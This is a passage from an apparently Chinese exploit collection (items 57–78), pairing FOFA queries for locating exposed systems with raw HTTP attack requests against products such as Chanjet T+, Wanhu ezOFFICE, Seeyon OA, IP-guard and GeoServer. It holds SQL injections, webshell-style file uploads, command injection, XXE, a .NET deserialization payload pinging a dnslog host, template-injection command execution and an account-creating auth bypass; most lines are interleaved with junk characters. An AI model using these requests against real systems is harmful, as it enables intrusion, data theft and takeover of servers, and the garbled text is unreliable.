User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
_8 i/ m2 w# J) ^" g1 xContent-Type: application/json
* O6 O1 f% R3 t" C" o' s7 x: R3 x. D1 X9 Q
{
: C& p- @: f7 E& o5 k! A "storeID":{
3 ]+ \8 Z* m- w: a# h2 S) g "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
( W( G; S8 F& t7 `" R I6 t "MethodName":"Start",
/ n3 ^7 g" s4 R0 E. `7 G7 w& k "ObjectInstance":{% R+ J _: X; X$ E* ~9 O
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 p) p+ D# X* |$ B
"StartInfo": {" D; Y% A: q% l* W
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* R4 d: e- x4 e
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
, a; t' [, P& ]* Q/ b2 P }1 `4 i. E6 R |& @/ O7 U
}
6 S* c9 P: X J% V }) ?$ L: o G3 ]
}) x% @# N) Q# Z6 @& G; w" g2 I
; u7 |0 i; H$ [
, O6 A& D4 w8 U. V$ c
57. 畅捷通T+ keyEdit.aspx SQL注入) Q1 }$ u- a% b7 \. M
FOFA:app="畅捷通-TPlus"7 _+ W* D) r% s5 `
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
+ ?3 {7 u9 Y( Z F) S- nHost: host
! n7 O8 M7 }8 ^1 EUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" z: z. j3 l2 \$ J, H$ Z0 cAccept-Charset: utf-8
2 o8 F% G- H9 U7 t" `Accept-Encoding: gzip, deflate7 A l1 \! L; h& v! V. G2 Y
Connection: close7 h& x$ ?" d: Y% ?7 [
, s+ T& m( N8 W% i! o6 V
3 M& x7 Y, [, f3 F2 \6 T58. 畅捷通T+ KeyInfoList.aspx sql注入
( k3 F8 v( A+ D- W2 M8 dFOFA:app="畅捷通-TPlus"- `6 z* d; {+ Y, e8 k
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
a7 |3 w( W" zHost: your-ip
5 R3 H0 ^/ C! n3 `9 gUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. h& {1 T7 I6 w7 R LAccept-Charset: utf-8, X( a h" V! `5 b+ H( x( u# P# E
Accept-Encoding: gzip, deflate
8 T) c- w n8 A k/ \) ZConnection: close
: S! }, k$ ?8 h W
, N& q o( M! S, f
# ]: q' b2 G& R7 e/ L# H59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 F. M ^% ^; W( v8 F2 iFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"! n3 Z# ]( f3 W3 |" t7 D; H3 j
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.18 S1 \( E# K! X. X
Host: 192.168.86.128:90906 J( a. P2 G, C* d
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36( ^& q0 h0 H, E* h2 F% @% {
Connection: close3 k& H9 V& o- L( h% p, y& C2 ]
Content-Length: 1669. U1 D: r& ^( s: y; H
Accept: */*; V" ^8 k, p: E" \
Accept-Language: en
+ x% V0 E5 |. {& T7 LContent-Type: application/x-www-form-urlencoded
4 y3 G$ N9 w. yAccept-Encoding: gzip4 C0 H" _* P$ W8 H# E" x
]4 ?& Y) W, Z; CPAYLOAD
8 l2 g' Z* k- o$ j" ~
2 V6 Z8 j! E( L" X$ Y. `; K# @1 S2 M
60. 百卓Smart管理平台 importexport.php SQL注入% s( Z: ?: i& X7 v# C8 W
FOFA:title="Smart管理平台"
2 R+ {+ l6 B$ f* h# \GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
7 F# Y$ ]$ N% O7 _Host:
, i7 O' }2 `5 c4 o$ h6 E- ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 ?* K3 h W- C6 m: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: @1 p; O" q9 q7 wAccept-Encoding: gzip, deflate0 ]( H* `- ^4 W% `
Accept-Language: zh-CN,zh;q=0.91 R% [# A8 f2 H! V8 b
Connection: close- I5 m6 G2 O$ \9 h; a% h1 k. V
0 a8 e% Q/ a- ]' ]& r2 S* T- X
. ^; d3 H$ W* Z# I2 t$ {
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" O2 @; N# ]) QFOFA: title="欢迎使用浙大恩特客户资源管理系统"
3 k4 V/ G2 c9 q3 k; L' |* H* ZPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) c! N, v! O% g; }( P% u
Host: x.x.x.x
) A+ p& s+ G0 U r- h0 \2 y6 ^$ YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 g- q6 y8 N) {" u P
Connection: close% _, L7 k; s4 j9 `% q
Content-Length: 27
0 K7 ^+ a' q$ v2 MAccept: */*' {8 d1 z3 d4 u' M
Accept-Encoding: gzip, deflate
$ W9 a# ?% `& F$ |Accept-Language: en
( M9 q6 ]' W' Q' R, L9 {! `1 lContent-Type: application/x-www-form-urlencoded
3 L7 o' i4 l4 ~6 |' E9 n. ~( x
3 k8 R7 @ j [; J# @8uxssX66eqrqtKObcVa0kid98xa. o1 V' r0 R# ]3 g
4 g% D; T/ A2 ^2 \7 b! _- R( ~
/ }( W5 P9 I; C62. IP-guard WebServer 远程命令执行& S% l, [9 e/ c# J
FOFA:"IP-guard" && icon_hash="2030860561"
% n0 s% Z2 E, N$ D" L3 w3 F6 tGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1' T( `7 @& i6 b5 B. V4 ]# F
Host: x.x.x.x; l6 P9 ` c5 X, }6 d
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
8 L- J$ B3 a) h T- OConnection: close$ | f) \9 m& m4 c' B1 P( X4 q
Accept: */* F4 ]0 J# o. u
Accept-Language: en
1 u# A/ m' ~- I j& w- Q6 I- @Accept-Encoding: gzip6 I+ N% @: A. n/ V, u
4 j+ o; q+ L6 Q0 n& X% c4 V( j3 @! d: G
访问; s- Z' R/ j$ n) K
) ]1 }, y9 T" z r4 P8 |! |GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1* d% H$ w0 l) }/ b7 Z
Host: x.x.x.x
9 ^6 C3 |2 ^2 g$ y( V `+ w, J( t# d) i( K. d2 v3 Y
# g0 L/ D3 ^! i; n3 K% l" o: ^
63. IP-guard WebServer任意文件读取
! t$ R: @- A `IP-guard < 4.82.0609.0
+ p# I: z4 H" ?* H9 F8 v; u$ z1 mFOFA:icon_hash="2030860561"5 b' j1 b& T7 F. M$ k& V4 f u
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
& l" H0 h- i' ]0 oHost: your-ip; d2 K1 a1 C7 s4 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 s. K! \' x# M; a, s5 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; w4 X2 p6 ?* w7 j0 t) z& w
Accept-Encoding: gzip, deflate; c u" C, q. h% |$ Z) @: m: K
Accept-Language: zh-CN,zh;q=0.9! ]: C8 [( b/ x8 E8 X8 A
Connection: close
" \' O) ~7 m- Q- h6 }Content-Type: application/x-www-form-urlencoded( [& J/ |$ n$ r7 p* L; |& F4 J
) R; K( n: `' j' b- h
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A/ a3 T" N/ c7 M0 x
: N& p" z; U1 _; p. M64. 捷诚管理信息系统CWSFinanceCommon SQL注入% }. V3 h+ H. A A
FOFA:body="/Scripts/EnjoyMsg.js"
4 n B) ]/ v1 }- F; l* d7 j8 NPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
' J0 M8 Z) ^: d/ @/ ^Host: 192.168.86.128:9001) x, @4 j6 I+ G4 b3 P
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
/ d1 O4 k, r# \, eConnection: close- c& W: C9 p# ]8 E. e
Content-Length: 369) u! s. ]* u' T5 {% b
Accept: */*( r0 o J1 E8 r
Accept-Language: en) c* `1 L0 U f/ H7 ~' s: y+ q
Content-Type: text/xml; charset=utf-8
3 }! _ C/ V# n* Y: S7 HAccept-Encoding: gzip" M2 a3 |% Y7 v
4 f( b% S8 v) N2 @7 ^: e; v<?xml version="1.0" encoding="utf-8"?>
7 }: f5 x/ D! w+ o<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! l; t* R. P9 q% b<soap:Body>
" z$ S; ~9 o- {7 w& m <GetOSpById xmlns="http://tempuri.org/">
; i$ q" }9 F) _9 r7 s <sId>1';waitfor delay '0:0:5'--+</sId>( `" a3 e) W" X+ k0 _
</GetOSpById>
8 }! M( a1 c- t/ b </soap:Body>
- J5 O# |3 i8 r: C) }</soap:Envelope>
* `# i: G4 A& B7 \5 q1 _ o' Q# [: U: z9 w1 ]
' P2 j+ G0 N" F; {$ j( }65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 t. s3 b5 m# N5 O! S
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"% L# p/ ~3 I$ l/ L. U. \. E. }
响应200即成功创建账号test123456/123456
5 Z, v- p$ C& i$ t# a& O/ KPOST /SystemMng.ashx HTTP/1.10 F; l" g3 e2 n' @" j: }- H* n ~
Host:
/ |! Q+ d/ Z) a, f0 XUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)1 a( o* _; {/ @0 g4 ^
Accept-Encoding: gzip, deflate
4 G5 J' J4 Z: W$ P$ QAccept: */*
: [7 D: K }7 z6 cConnection: close4 W" n( I0 c5 G
Accept-Language: en
: G5 b+ D) x+ qContent-Length: 174
8 r6 u, h' ^! ]$ M
6 @, K$ M ^# E% S3 f6 N0 HoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
* ~4 O5 p7 V; a, C1 [/ x( X* R6 e. x4 G5 s. h+ M& _' K, ^
. l0 q5 ^8 i( |9 `- y
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% z3 A) u2 f. `% }! WFOFA:app="万户ezOFFICE协同管理平台": V8 S/ x+ V7 V( [
- r8 w# Z5 ?; r9 jGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
4 r0 u y: s" ^9 p! M8 FHost: x.x.x.x
4 d6 ^, y7 ^) G2 y, O4 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( Z0 n; `$ d8 ?# xConnection: close
! @) m5 L! i; z* d4 r4 rAccept: */*. a1 q& K+ V; \3 \$ j& ~/ D
Accept-Language: en& `. r( \3 Q1 m; E
Accept-Encoding: gzip9 S8 W2 N7 O0 Q) F/ B+ K+ u
. ~) N6 p3 y/ Z1 ^3 U- |0 r
3 E7 T) C. ?% q3 p* F7 a5 x; P. n3 I
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在, J- z3 X, O3 I4 S) n
4 Q: j3 K1 @- Z7 v) e* Y: ]67. 万户ezOFFICE wpsservlet任意文件上传) z q, }7 n/ i" o
FOFA:app="万户网络-ezOFFICE"" V8 h9 |6 G& H( Y' \1 l; G& w
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. V/ E5 S" k0 }POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1! u. O$ W2 E: }0 a+ z
Host: x.x.x.x
) }! D) l! C: QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.09 x% C) U+ J$ \# U3 W3 N
Content-Length: 173
$ L: O# k/ ^8 r6 u' r& zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: m0 a% g( A! AAccept-Encoding: gzip, deflate2 L" X' k4 @3 h7 y1 Z
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
1 {5 n- A3 c, [ R* IConnection: close/ J" r/ Y& r( e& x2 q
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 e% x% x; T0 F' X: h. q6 q) vDNT: 1
9 T6 f7 |& ]7 `0 M* q7 [Upgrade-Insecure-Requests: 1
# o# y5 j9 e7 k/ P" x3 X
8 j: {5 Q( g' M1 Z7 T6 Q W' m--ufuadpxathqvxfqnuyuqaozvseiueerp( P5 C2 o L+ N: h1 a9 ^/ W
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
" p1 f0 s; H7 }! @
) U5 i9 X% v- T<% out.print("sasdfghjkj");%>; s6 k! T9 N" S3 J. ?+ U" p- J
--ufuadpxathqvxfqnuyuqaozvseiueerp--
( U7 l6 E, R. t2 Y9 R6 O4 \* ~! O+ P. \% n4 o4 N" Q+ G
4 S1 ?; p- z% I3 |3 \文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
9 E! b0 `2 k l' l& m( f
1 T9 j0 X. a% O& h% N v' g68. 万户ezOFFICE wf_printnum.jsp SQL注入
8 P* v0 F/ K+ G+ @/ _2 i) W9 IFOFA:app="万户ezOFFICE协同管理平台"/ Y! Q8 k. N0 P+ Z& a9 u7 p' i0 A+ j
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# E7 `4 ?- I/ i9 H% E! g' XHost: {{host}}5 A4 e+ W! Z& A+ I' U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.369 Y7 [2 k- V) P) @& K( g( V( p$ j
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
( z6 Y, n- h6 x& S/ ^Accept-Encoding: gzip, deflate
3 S3 P5 _9 j9 K7 ~+ O/ \Accept-Language: zh-CN,zh;q=0.9
) S8 O# ~; w! }& oConnection: close
! p+ _/ b0 N& ]# x+ v i
7 w/ e7 S5 r, K$ a" u! J& i$ f: n
( w, A" f6 A" a4 U6 ~69. 万户 ezOFFICE contract_gd.jsp SQL注入9 l7 ^4 P: r- }8 j! C. q Q# I5 b, c% c
FOFA:app="万户ezOFFICE协同管理平台"6 J1 x6 l, F3 v
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
; G- S' {, ~: r: }! p: W. h" aHost: your-ip
* S' R/ O( v& _0 f- a) d6 RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 y9 t- |$ h5 g/ rAccept-Encoding: gzip, deflate" e; g5 ]( G$ C' e) p% R ?
Accept: */*
! ?6 M9 `, Q7 R5 y5 `# MConnection: keep-alive
) e' m* J. o& X" j. G* A+ |
) @8 d1 w, L# ^1 v/ s
! w8 E1 m9 |9 \( f. H0 {70. 万户ezEIP success 命令执行/ _# S' v& P3 u- |
FOFA:app="万户网络-ezEIP"
6 N7 B6 T: ~5 ^1 QPOST /member/success.aspx HTTP/1.1
$ F8 L+ x- g5 Y5 K+ YHost: {{Hostname}}
$ } F9 V6 J/ f! ?) S8 U$ _) EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! v% x6 M) Q6 g& r; `0 ]SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
+ t: Y+ a1 z4 R" T: [Content-Type: application/x-www-form-urlencoded
; V, k8 _! q; lTYPE: C' u n: A* n" H
Content-Length: 16702; e1 N/ H) B# n% E6 R6 Z' Q5 u
! m# X9 E! F6 I& G' M__VIEWSTATE=PAYLOAD
- O5 ]& H2 U" |) {, v/ G2 j. G- ~( a) c( o
7 `" t/ v( v+ d9 c, g/ a+ l71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入0 ?7 I, ~3 k4 t" H+ ?
FOFA:body="PM2项目管理系统BS版增强工具.zip"9 m( t1 o" Y. m. y
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
/ l) G3 X) y! aHost: x.x.x.xx.x.x.x5 u* j+ X, T3 }2 l$ Y1 V0 q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 I+ q3 w e |$ }. {0 PConnection: close8 D. z/ _# K* i, N) A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( j D- e. P- t8 M! ]0 e+ nAccept-Encoding: gzip, deflate2 s1 F! r/ L" j$ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' o' n: D3 d; m7 D! s8 aUpgrade-Insecure-Requests: 1+ J3 B( R9 d0 s& }5 ?% b0 h
4 D- [5 b1 R+ @
' p3 A* e/ P+ F) D% w6 j72. 致远OA getAjaxDataServlet XXE
4 E+ Q% L7 g8 GFOFA:app="致远互联-OA"6 H g& N* p& {5 u; ^" ^
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ z$ _# V _2 H" P! B0 }, f' E
Host: 192.168.40.131:8099
* V' s5 [9 @7 M$ ~User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
& z- T( ^+ o# | hConnection: close
) H) G% y- y" fContent-Length: 583* \& N- X* l M5 t/ B( s- v: |
Content-Type: application/x-www-form-urlencoded" b% D m( Y1 |$ O! S# |3 Y
Accept-Encoding: gzip! d% h% Q u, e/ S* X3 Z( l
1 L8 U7 I! P7 E, A1 RS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E' Z# x/ ^4 w% R0 _4 d' X- C$ b7 K
3 e7 \! F$ F) d+ ]( z! X; k
+ O1 J# s2 C' B: l5 d* Q1 d73. GeoServer wms远程代码执行% c' {% E% U1 B' E. ^- \ b
FOFA:icon_hash=”97540678”
9 ~3 `1 }1 W) ^1 p3 T) KPOST /geoserver/wms HTTP/1.10 ^% H2 s, U: ]
Host:
8 X* U1 v! \, ^ u; Y& {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" j8 }/ N+ y1 ~4 Q( lContent-Length: 1981, {: S1 F$ T8 \1 f2 z
Accept-Encoding: gzip, deflate1 C2 Y- h- R$ b+ S5 E' p/ a
Connection: close
" l3 y8 t8 e5 [9 |0 _, sContent-Type: application/xml
1 C9 U7 x8 {8 p* b$ H6 }) z' RSL-CE-SUID: 3
# Q8 S _6 i5 C4 e9 w* t, U
2 J% f Q3 N5 z/ wPAYLOAD
2 u7 e$ F: f1 G) L7 k7 g8 ]" H9 h6 J# @& W) a7 l- @
- X% E, \1 F0 F( Q" @4 F) ^
74. 致远M3-server 6_1sp1 反序列化RCE
7 [2 v# O( j. C5 f% T! V- {2 W( q( j# ~FOFA:title="M3-Server"
: ~5 o! I5 v$ cPAYLOAD$ p" f: l6 b6 ` S5 L( T, ^+ N5 e
6 Z& c$ o: ]2 w: N9 x) w; I
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! l" t# w0 S7 A3 P8 C+ L* S, ^FOFA:app="TELESQUARE-TLR-2005KSH"
9 a& }4 T. Q* ?1 _6 S' |GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.13 [! S$ I* S- F
Host: x.x.x.x
8 {6 G0 ~0 u6 M# ^$ o/ q: U% MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 I0 ?% q* C, O L
Connection: close
e' x; I4 X2 m$ wAccept: */*' N. R3 |0 S3 b! a
Accept-Language: en
4 |; a2 w7 \! G3 \# LAccept-Encoding: gzip1 u" Y* A) @+ k% |: Y* `
6 u: P# j! }7 `/ e( |9 o
4 b- t3 u2 K3 Q# w iGET /cgi-bin/test28256.txt HTTP/1.1, {8 c) H* u* W3 h6 w4 \' ] z
Host: x.x.x.x' t5 Q8 i, O2 \9 b* m3 _% y% S" {
+ j) l1 a! D9 ^
/ @9 j5 c: V: w' @
76. 新开普掌上校园服务管理平台service.action远程命令执行; I. F5 ]$ |9 q
FOFA:title="掌上校园服务管理平台"
$ s' ]7 B+ H, J @( H* f2 [4 ^POST /service_transport/service.action HTTP/1.1
( [0 _. ~+ R: X2 u, i% kHost: x.x.x.x, F( j4 N3 C5 _. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0$ z0 T, W/ q# d7 p* q
Connection: close
! j) W& N. D* L7 `" X2 w1 sContent-Length: 211! n" U# \8 m$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 w+ s% B# V9 L2 }. i0 O
Accept-Encoding: gzip, deflate
: Q/ f+ n1 k# g, YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ z& e' m) I) N; lCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4) o8 \# z# n9 g
Upgrade-Insecure-Requests: 1$ h8 u" a/ | _. l
7 ~' y% I: h. L5 ~/ W
{
/ |' Y. q* P9 P0 O; l"command": "GetFZinfo",
0 A- K2 d8 y- Z "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
; q* o( p$ |1 T5 G ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"* C0 {1 u/ v7 X* o
}
. A# q g2 y% B+ l
' J& j. z1 I; C5 s4 j; @' E( J! W) H% @+ a! h
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.19 Q- ^2 ~" A7 Z! O7 c5 ^0 ^* V& g: `
Host: x.x.x.x
. S1 e$ Z1 n4 F& I# s
+ w& G) Z3 C1 u- S+ A2 G/ I. _! ` i
' o9 f% N) y. y% p: m n+ |- d$ r
77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ X' G0 `% H0 c( ?
FOFA:body="F22WEB登陆"
$ H6 m# Q. y; W- mPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
! C2 G) d: A% U, S B3 J& t+ E! Z+ zHost: x.x.x.x
6 A$ B2 M, _$ z6 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 P( ? u8 L% z& G5 K) e8 U' pConnection: close
1 I+ G) z' @1 W; j; Q# t+ kContent-Length: 433+ @! _1 f. ?# F" \0 D' l/ H
Accept: */*
! @- X1 |, U' hAccept-Encoding: gzip, deflate
% B1 m8 V5 `5 T+ y# \% jAccept-Language: zh-CN,zh;q=0.9* F' F, K1 u; ~9 \5 X2 N
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
' P5 {6 Y' f8 x. d, Y9 G/ m" s& f ?% I7 e% l
------------398jnjVTTlDVXHlE7yYnfwBoix8 {) b& U6 b# i9 y/ k/ t
Content-Disposition: form-data; name="folder"+ _* @: ]' t& j0 v
& k5 m3 T) [0 [' O/upload/udplog5 V& _) H( _; G
------------398jnjVTTlDVXHlE7yYnfwBoix& B$ B! q W: Q, f* s
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"! J2 |: B- m$ {! `3 J! g
Content-Type: application/octet-stream
& ?* {0 s$ s* ~0 r
7 v( ?/ Z: v3 F6 `: Mhello1234567
( [2 E* ]8 ~7 ?3 r0 | ^, S4 |/ _------------398jnjVTTlDVXHlE7yYnfwBoix
. y1 @) @( |5 i5 i( uContent-Disposition: form-data; name="Upload"8 f c0 G% }7 ~- s/ ~
3 w* i8 R) x7 V
Submit Query
3 Y" M1 C2 \/ \+ c/ a1 r! |; q6 _------------398jnjVTTlDVXHlE7yYnfwBoix--
* H! j. d% o, E) W
9 {" ~2 d v1 m3 A# ^* h
9 [, v6 U4 x" F. W7 n! u% V+ h, @78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' |+ U g: Y$ R2 Q, CFOFA:icon_hash="2001627082") z: k `7 ~; L. D) `; o+ C' u+ V9 \
POST /Platform/System/FileUpload.ashx HTTP/1.14 y" {; ~& E# g) K$ `6 y, R
Host: x.x.x.x
$ I/ U$ x$ _* Z" t# Q; P7 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& O' _6 K- S& J/ x* F. \
Connection: close
7 x% X) `1 [( r. _* vContent-Length: 336
" Y& j# X8 P7 d5 [) z; VAccept-Encoding: gzip) ~4 G' e# n i" e$ g/ {
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) y a4 h0 t, E3 L6 P2 h9 R7 b, j
6 w: d5 a# y9 _* z. \8 w. W------YsOxWxSvj1KyZow1PTsh98fdu6l, D; y- A$ Y7 W8 t4 o
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
) ^1 |0 N4 e! k) PContent-Type: image/png
; O4 J$ u& V' u7 ]- Q& T4 L
. ^6 u% O% j$ L' W4 P" _YsOxWxSvj1KyZow1PTsh98fdu6l" k8 Z, M" [( a5 g6 q" [$ s
------YsOxWxSvj1KyZow1PTsh98fdu6l
* z9 M r. x- Q& K6 VContent-Disposition: form-data; name="target"
3 j6 m/ W9 \5 h, E; Z& ~$ l# s: b5 j8 R6 \5 W: h% \
/Applications/SkillDevelopAndEHS/4 p( `8 p* j) b- ~
------YsOxWxSvj1KyZow1PTsh98fdu6l--" t8 y% E" K+ C8 R2 p% M; p1 }
4 I: u$ s& X2 Q) u7 \! n1 p9 d4 u0 S5 l0 c5 Z
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
